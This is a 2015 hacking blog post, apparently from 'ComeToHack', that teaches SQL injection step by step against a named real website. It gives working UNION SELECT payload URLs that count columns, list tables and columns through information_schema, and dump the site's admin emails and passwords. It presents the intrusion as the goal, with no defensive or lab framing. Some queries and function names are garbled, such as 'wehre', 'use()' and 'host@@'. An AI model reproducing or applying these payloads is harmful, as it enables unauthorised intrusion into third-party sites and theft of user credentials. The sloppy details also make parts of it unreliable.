Tuesday, 18 August 2015

How to hack website manual (Full Guide)

Hello ComeToHack.com *-.-* 
                                               Once again ComeToHack here, today i gonna start Sqli Injection, today is First class so lets start.

Requirements :-

Firefox Browser


Vulnerability Site  

Ok i have already Vulnerability site like this

http://www.morephotosradio.com/transcript.php?interview_id=2021

Check this this website vulnerability yes or no, Put ' in the end of Url Like
  Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'

yes i got a sql error you can see this

http://www.ComeToHack.com/
Step 2
=> Find tables numbers using order by--+- query For example

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+-  (No Error)

http://www.ComeToHack.com/


and so on when we got Error this mean its table number like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+-  (No Error)

http://www.ComeToHack.com/

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+-  ( Error)

http://www.ComeToHack.com/
its mean its have 46 table numbers

Step 3
=> Go to union based => Union statement and Select INT,INT

http://www.ComeToHack.com/

Step 4
=> Now enter table number value and click ok 

http://www.ComeToHack.com/

Step 5
=> after click ok you see this suto type 1 to 46 numbers then click Execute for checking its working 

http://www.ComeToHack.com/

Its working we can't got any error :D 

step 6
=> Put in the end link values like this
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-

http://www.ComeToHack.com/

you can see this when we put - we go got Columns number is 6

Step 7
=> Now we need version :-
replace 6 number this query "version()"

http://www.ComeToHack.com/

you can see this we got sqli Version if you want more information like user name hostname and database use this query :-

For Version = version()
For Database = database()
For use = use()
For Host = host@@

Step 8
=> now we need table information so replace 6 number follow query "group_concat(table_name)" without quotes and in the end or url use this query "from information_Schema.tables wehre table schema=database()--+-" without quotes like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(tables_name),7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-

http://www.ComeToHack.com/

you can see this we got all table names , we need admin user name because we wanna hack website :D

Step 9
=> now replace "database()" with User

http://www.ComeToHack.com/

Now select user and go to "sqli basics" and select "char()" then past "user" then click ok like 


http://www.ComeToHack.com/

And replace table with columns like this
For columns 
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,
15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
 now click Execute  

http://www.ComeToHack.com/

Step 10
Now we need admin Email id and password now use this query 

replace column_name with which data we need and ,0x3a, mean when we need more data or in the end of url type table name

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17
,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-

http://www.ComeToHack.com/

You can see this we got all admin emails and passwords ;) :D 

i hope you like this Tutorial 

Thanks for visiting
  

No comments:

Post a Comment